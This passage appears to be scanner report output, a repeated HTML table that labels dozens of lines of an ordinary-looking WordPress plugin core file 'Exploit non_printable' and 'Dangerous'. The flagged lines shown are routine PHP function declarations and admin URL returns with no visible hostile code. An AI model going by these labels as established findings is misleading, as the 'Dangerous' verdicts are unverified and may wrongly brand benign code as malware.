</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 264</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_bsf_core</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 314</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_plugins' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 371</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'register_bsf_core_admin_styles' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 377</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_bsf_core_admin_styles</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 426</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'print_bsf_styles' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 430</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">print_bsf_styles</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 461</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_flush_bundled_products' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 465</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_flush_bundled_products</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 486</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return array </span><span style="color: #0000BB">of bundled plugins </span><span style="color: #007700">for </span><span style="color: #0000BB">a specific</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 490</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_bundled_plugins' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 496</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_bundled_plugins</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 507</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$products</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 516</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'brainstrom_product_name' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 522</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">brainstrom_product_name</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 534</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$product_name</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 543</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'brainstrom_product_id_by_name' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 549</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">brainstrom_product_id_by_name</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_name </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 54</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 561</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$product_id</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 565</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'brainstrom_product_id_by_init' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 571</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">brainstrom_product_id_by_init</span><span style="color: #007700">( </span><span style="color: #0000BB">$plugin_init </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 584</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return isset( </span><span style="color: #0000BB">$product</span><span style="color: #007700">[</span><span style="color: #DD0000">'id'</span><span style="color: #007700">] ) ? </span><span style="color: #0000BB">$product</span><span style="color: #007700">[</span><span style="color: #DD0000">'id'</span><span style="color: #007700">] : </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 595</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_dismiss_extension_nag' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 599</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_dismiss_extension_nag</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 621</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_bsf_core_styles</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 630</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_core_debug_link' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 636</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_core_debug_link</span><span style="color: #007700">( </span><span style="color: #0000BB">$text </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 649</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$text</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 663</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">brainstorm registration page URL</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 667</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_registration_page_url' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 674</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_registration_page_url</span><span style="color: #007700">( </span><span style="color: #0000BB">$append </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 67</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'set_bsf_core_constant' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 689</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">admin_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'options.php?page=bsf-registration' </span><span style="color: #007700">. </span><span style="color: #0000BB">$append </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 703</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$product_registration_link </span><span style="color: #007700">. </span><span style="color: #DD0000">'' </span><span style="color: #007700">. </span><span style="color: #0000BB">$append</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 709</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">network_admin_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'settings.php?page=bsf-registration' </span><span style="color: #007700">. </span><span style="color: #0000BB">$append </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 711</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">admin_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'options-general.php?page=bsf-registration' </span><span style="color: #007700">. </span><span style="color: #0000BB">$append </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 715</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">network_admin_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'admin.php?page=bsf-registration' </span><span style="color: #007700">. </span><span style="color: #0000BB">$append </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 717</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">admin_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'index.php?page=bsf-registration' </span><span style="color: #007700">. </span><span style="color: #0000BB">$append </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 71</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_bsf_core_constant</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 726</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">extension installer page URL</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 728</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_exension_installer_url' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 733</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string URL</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 735</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_exension_installer_url</span><span style="color: #007700">( </span><span style="color: #0000BB">$priduct_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 740</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">network_admin_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'settings.php?page=bsf-extensions-' </span><span style="color: #007700">. </span><span style="color: #0000BB">$priduct_id </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 742</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">network_admin_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'admin.php?page=bsf-extensions-' </span><span style="color: #007700">. </span><span style="color: #0000BB">$priduct_id </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 745</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">admin_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'admin.php?page=bsf-extensions-' </span><span style="color: #007700">. </span><span style="color: #0000BB">$priduct_id </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 750</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_set_options' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_set_options</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 84</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'init_bsf_plugin_installer' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 865</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_flush_skip_registration</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 872</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">site option brainstorm_products</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 877</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (array) </span><span style="color: #0000BB">$brainstorm_products</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 879</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_get_brainstorm_products' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 884</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">$brainstorm_products</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 886</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_brainstorm_products</span><span style="color: #007700">( </span><span style="color: #0000BB">$mix </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 88</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_bsf_plugin_installer</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 896</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$brainstorm_products</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 902</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_envato_redirect_url_callback</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 926</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
